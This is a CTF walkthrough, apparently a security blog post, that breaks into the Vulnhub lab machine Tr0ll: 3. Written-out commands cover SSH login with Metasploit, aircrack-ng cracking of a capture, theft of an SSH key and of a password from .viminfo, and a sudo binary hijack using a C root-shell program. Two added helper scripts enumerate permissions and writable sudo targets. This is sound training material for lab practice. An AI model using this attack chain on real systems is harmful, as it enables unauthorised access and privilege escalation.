Tr0ll: 3 Vulnhub Walkthrough

Today we are going to solve another CTF challenge called “Tr0ll: 3”, part of the Tr0ll series. It is available on Vulnhub for online penetration testing practice. The lab is not that difficult if we have a proper grounding in penetration testing. Credit for building it goes to Maleus. Let’s start and learn how to breach it.

Level: Intermediate

Since these labs are hosted on the Vulnhub website, we download the .ova file from this link and run it in VMware Player or VirtualBox. Once the VM is up, we used netdiscover to find its IP address, which turned out to be 192.168.1.104.


netdiscover

We start our attack with a port scan using the leading scanning tool, nmap, in aggressive mode (-A: version detection, default scripts, OS detection and traceroute). The scan shows that only the SSH port is open on the target.


nmap -A 192.168.1.104

When we booted the VM we were greeted with a console banner, shown in the image. It hints at the credentials: below the login prompt, “Start here” is written in the format:


start:here

Login credentials are commonly written as username:password, so we try start / here.

So we fired up the Metasploit Framework on Kali with the msfconsole command and used the ssh_login scanner auxiliary to log in. We select the module with the “use” command, point it at the target with “set rhosts” (rhosts means remote hosts), set the username and password, and run it. Note that ssh_login returns a plain command-shell session; the Meterpreter prompt used below comes from upgrading that session (sessions -u <id>). We then uploaded the LinEnum script and ran it, but it turned up nothing useful.


msf5> use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.104
msf5 auxiliary(scanner/ssh/ssh_login) > set username start
msf5 auxiliary(scanner/ssh/ssh_login) > set password here
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
meterpreter > cd /tmp
meterpreter > upload /root/LinEnum.sh
meterpreter > shell
python -c 'import pty;pty.spawn("/bin/bash")'
chmod 777 LinEnum.sh
./LinEnum.sh

Since LinEnum did not help, we enumerated by hand with the find command and its -perm parameter, looking specifically for files whose mode is exactly 0777 (readable, writable and executable by everyone); 2>/dev/null silences the permission-denied noise. After a bit of digging this turned up a .cap file and a text file, which we pulled back to our machine with Meterpreter’s download command.


find / -type f -perm 0777 2>/dev/null
meterpreter > cd /var/log/.dist-manage
meterpreter > ls
meterpreter > download wytshadow.cap /root/Desktop
meterpreter > cd /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it
meterpreter > download gold_star.txt /root/Desktop/
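The find invocation above only matches files whose mode is exactly 0777, which is why it is worth knowing the other -perm forms before concluding a box has nothing interesting. The script below is an added example, not code from the original walkthrough; it builds a throwaway fixture directory (the file names and modes are constructed) and runs the three searches a practitioner usually wants: exact 0777, anything world-writable, and anything setuid.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): how find's -perm
# modes differ, demonstrated on a constructed fixture tree instead of /.

# Build a constructed fixture: one exactly-0777 file, one world-writable
# 0666 file, one setuid 4755 file, one ordinary 0644 file.
make_fixture() {
    d=$(mktemp -d)
    touch "$d/exact777" "$d/ww666" "$d/suid4755" "$d/plain644"
    chmod 0777 "$d/exact777"
    chmod 0666 "$d/ww666"
    chmod 4755 "$d/suid4755"
    chmod 0644 "$d/plain644"
    printf '%s\n' "$d"
}

# -perm 0777: mode must be exactly 0777 (what the walkthrough ran).
find_exact_777()      { find "$1" -type f -perm 0777 2>/dev/null | sort; }
# -perm -0002: the other-write bit is set, whatever the rest of the mode is.
find_world_writable() { find "$1" -type f -perm -0002 2>/dev/null | sort; }
# -perm -4000: the setuid bit is set (classic privilege-escalation candidates).
find_setuid()         { find "$1" -type f -perm -4000 2>/dev/null | sort; }

# Reduce a list of paths to space-separated basenames for easy comparison.
names() { sed 's#.*/##' | tr '\n' ' ' | sed 's/ $//'; }

if [ "${1:-}" = "--demo" ]; then
    fx=$(make_fixture)
    echo "exact 0777:     $(find_exact_777 "$fx" | names)"
    echo "world-writable: $(find_world_writable "$fx" | names)"
    echo "setuid:         $(find_setuid "$fx" | names)"
    rm -rf "$fx"
fi
```

Run it with --demo: the exact-0777 search finds only exact777, the world-writable search also picks up ww666, and only the setuid search reports suid4755. On a real target, run the world-writable and setuid forms against / as well, since a file mode 0777 search alone would have missed the last two.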

A .cap file can be opened in Wireshark. Doing so shows every packet with the Protocol column marked “802.11”, which is a hint in itself.

For those who do not know it, 802.11 is the IEEE family of standards that specifies the media access control (MAC) and physical layer for wireless LANs, i.e. Wi-Fi.

Now that we know these are Wi-Fi packets, we use aircrack-ng to recover the password, with the text file as the wordlist and the capture as the input, as shown in the image below. This is a dictionary attack: it only succeeds because the capture contains the traffic aircrack-ng needs to test candidates and the passphrase is in gold_star.txt; with another wordlist it would simply report that the passphrase was not found. aircrack-ng gave us the password gaUoCe34t1.


aircrack-ng -w gold_star.txt wytshadow.cap

With the password in hand we switch user with su. The username, wytshadow, is the same as the name of the cap file. After logging in we look around and find a file named oohfun. It has permission to run as root, so we ran it, as shown in the figure: its output repeats the name “Lynx”, which is a text-mode browser, so it will probably matter further on.


su wytshadow
cd
ls -al
./oohfun

Next we ran sudo -l to list what we can run as root: the nginx service. Looking for clues about nginx we went into /etc/nginx and its sites-enabled directory and read the default site config with cat. It checks the User-Agent header for Lynx, meaning the site only serves requests that claim to come from the Lynx browser.


sudo -l
cd /etc/nginx
ls
cd sites-enabled
ls
cat default

We then started the nginx service as shown in the image. netstat now shows port 8080 listening; it was closed during our earlier nmap scan, which is why the scan showed only SSH.


sudo /usr/sbin/service nginx start
netstat -antp

As discussed, the site expects Lynx, so we installed the lynx browser on Kali and opened the page on the port we just started. Installing Lynx is not strictly required: any client that sends a User-Agent satisfying the config’s check will do, for example curl -A Lynx http://192.168.1.104:8080.


apt install lynx
lynx http://192.168.1.104:8080


Following the link on that page in lynx gives us a set of login credentials. That was not that difficult, was it?

Credentials Found:


Username: genphlux
Password: HF9nd0cr!

With the new credentials we switched to the genphlux user with su. In its home directory we found a file named maleus; the file command identifies it as a private key, as shown in the image, so we printed it with cat to copy it to our own system.


su genphlux
cd
ls -al
file maleus
cat maleus

Now that we have the private key, we pasted it into a text editor and saved it as “key”, then tightened its permissions with chmod: ssh refuses to use a private key that other users can read or write. We logged in as maleus with that key, as shown in the image. In the home directory we found a file named dont_even_bother, which the file command reports as an ELF 64-bit executable. Listing the directory with ls -al to show hidden files turned up a .viminfo file, which looks interesting.


chmod 600 key
ssh maleus@192.168.1.104 -i key

We read .viminfo with cat. Vim writes its command-line history, search patterns and register contents to this file, so text typed during an editing session can survive there long after the session ends. On close inspection it contained a password, “B^slc8I$”. This is a good discovery.


cat .viminfo

Now that we have a password, sudo -l will tell us what maleus may run as root. The entry is the dont_even_bother file we found earlier. Because it lives in our own home directory we can replace its contents with whatever we like, and sudo will still run it as root. First we empty the file with echo, then write a replacement source file with nano.


sudo -l
echo "" > dont_even_bother
nano dont_even_bother.c
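The reason this works is that the sudoers entry names a file the current user can overwrite. The script below is an added example, not part of the original walkthrough: it reads text in the shape of sudo -l output, extracts every absolute command path, and reports which ones the current user could hijack, either because the file itself is writable or because its directory is (so the file can be deleted and recreated). The sudo -l lines and the fixture paths it checks are constructed for the demo, not the target’s real output.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: flag sudo -l entries
# whose command binary the current user could replace. The sample sudo -l
# text and the fixture tree below are constructed for the demonstration.

# Print the absolute paths named in sudo -l style lines, one per line.
# Only the first token starting with "/" on each line is taken: the command.
sudo_paths() {
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^\//) { print $i; break } }'
}

# For each path on stdin, print "<path> <reason>" when it can be hijacked.
writable_sudo_targets() {
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        if [ -w "$p" ]; then
            printf '%s file-writable\n' "$p"
        elif [ -w "$(dirname "$p")" ]; then
            printf '%s dir-writable\n' "$p"
        fi
    done
}

# Build a throwaway tree standing in for the target's filesystem:
# one binary we own in our home directory, one locked down under /usr/sbin.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/home/maleus" "$d/usr/sbin"
    touch "$d/home/maleus/dont_even_bother" "$d/usr/sbin/service"
    chmod 0755 "$d/home/maleus/dont_even_bother"   # ours: writable
    chmod 0555 "$d/usr/sbin/service"               # not writable ...
    chmod 0555 "$d/usr/sbin"                       # ... and its dir neither
    printf '%s\n' "$d"
}

# Constructed sudo -l style output, with paths rewritten under the fixture root.
sample_sudo_l() {
    printf 'User maleus may run the following commands on tr0ll3:\n'
    printf '    (ALL) NOPASSWD: %s/home/maleus/dont_even_bother\n' "$1"
    printf '    (root) %s/usr/sbin/service nginx start\n' "$1"
}

# Remove the fixture (the locked directory must be reopened first).
drop_fixture() { chmod 0755 "$1/usr/sbin"; rm -rf "$1"; }

if [ "${1:-}" = "--demo" ]; then
    fx=$(make_fixture)
    sample_sudo_l "$fx" | sudo_paths | writable_sudo_targets
    drop_fixture "$fx"
fi
```

Run with --demo as an unprivileged user it reports only the dont_even_bother path as file-writable; the service binary under a read-only directory is silent. On a real box, feed it the actual output: sudo -l | sudo_paths | writable_sudo_targets. Anything it prints is a root shell waiting to be compiled, exactly as in the next step.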

In this file we wrote a small C program that spawns a shell. Since the binary is executed through sudo as root, the shell it spawns is root’s as well. After editing, we save the file and exit nano.


#define _GNU_SOURCE          /* setresuid() is a GNU extension in <unistd.h> */
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setresuid(0, 0, 0);      /* sudo already runs us as uid 0; keep it explicit */
    system("/bin/sh");       /* spawn an interactive root shell */
    return 0;
}

As it is a .c file, we compile it with gcc, naming the output exactly as the sudoers entry expects, run it through sudo, and read the flag from /root.


gcc dont_even_bother.c -o dont_even_bother
sudo /home/maleus/dont_even_bother
id
cd /root
ls
cat flag.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Tr0ll: 3 Vulnhub Walkthrough appeared first on Hacking Articles.



from Hacking Articles https://ift.tt/2YLFvhE